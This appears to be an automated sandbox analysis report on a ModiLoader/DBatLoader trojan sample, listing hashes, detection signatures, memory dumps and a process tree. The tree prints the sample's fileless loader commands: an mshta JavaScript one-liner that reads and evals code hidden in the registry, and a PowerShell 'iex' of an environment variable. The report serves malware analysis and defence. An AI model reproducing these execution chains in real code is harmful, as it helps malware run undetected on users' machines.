Overview

overview

10

Static

static

f9937f8a6d...23.exe

windows7-x64

10

f9937f8a6d...23.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    3s
  • max time network
    47s
  • platform
    windows7_x64
  • resource
    win7-20220812-en
  • resource tags

    arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
  • submitted
    29/10/2022, 02:36

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    f9937f8a6d1a7add47605e74a0ea6c5a6e283ab7a3ee0df0c8579e293defd523.exe

  • Size

    411KB

  • MD5

    e9ba33fadd1ea38305250628f53e2088

  • SHA1

    6123ae818c96126cd28e0bf7791f90a9ef631ff7

  • SHA256

    f9937f8a6d1a7add47605e74a0ea6c5a6e283ab7a3ee0df0c8579e293defd523

  • SHA512

    3eea5112122f09c3c1ed4d28b40d36b7932480de991d91621949aad7afb69d1e511d691cf278e3dc7aa571c29e54a96723765e2a9db24f462bf81a44fda752d4

  • SSDEEP

    6144:K8O2/InoEK82ozZTLBRTp02iL6kJQKcdm5fyu1fhCKgteB1YCty:Kq/IxF2ozZTD91iL6SKu1fhCKgx

Score
10/10
modiloadertrojan

Malware Config

Signatures

  • ModiLoader, DBatLoader

    ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.

    trojanmodiloader
  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • ModiLoader Second Stage 1 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\f9937f8a6d1a7add47605e74a0ea6c5a6e283ab7a3ee0df0c8579e293defd523.exe
    "C:\Users\Admin\AppData\Local\Temp\f9937f8a6d1a7add47605e74a0ea6c5a6e283ab7a3ee0df0c8579e293defd523.exe"
    1⤵
    • Suspicious use of FindShellTrayWindow
    PID:1428
  • C:\Windows\system32\mshta.exe
    "C:\Windows\system32\mshta.exe" javascript:Rs9meYs="3hFR";SJ1=new%20ActiveXObject("WScript.Shell");s2rDX4MfV="rWbFjwbWOK";T3zLS=SJ1.RegRead("HKLM\\software\\Wow6432Node\\so8vEs\\PjxixjacfX");iWd5BJv8d="1NggxgdRH";eval(T3zLS);x98iJUAp="clPWC";
    1⤵
    • Process spawned unexpected child process
    PID:760
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" iex $env:nmibw
      2⤵
        PID:1040

    Network

    MITRE ATT&CK Matrix

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/760-58-0x000007FEFC0D1000-0x000007FEFC0D3000-memory.dmp

      Filesize

      8KB

      Download

    • memory/1040-61-0x0000000073940000-0x0000000073EEB000-memory.dmp

      Filesize

      5.7MB

      Download

    • memory/1428-54-0x0000000076261000-0x0000000076263000-memory.dmp

      Filesize

      8KB

      Download

    • memory/1428-55-0x00000000004C0000-0x00000000004F4000-memory.dmp

      Filesize

      208KB

      Download

    • memory/1428-56-0x0000000000400000-0x000000000046A000-memory.dmp

      Filesize

      424KB

      Download

    • memory/1428-57-0x0000000000050000-0x0000000000110000-memory.dmp

      Filesize

      768KB

      Download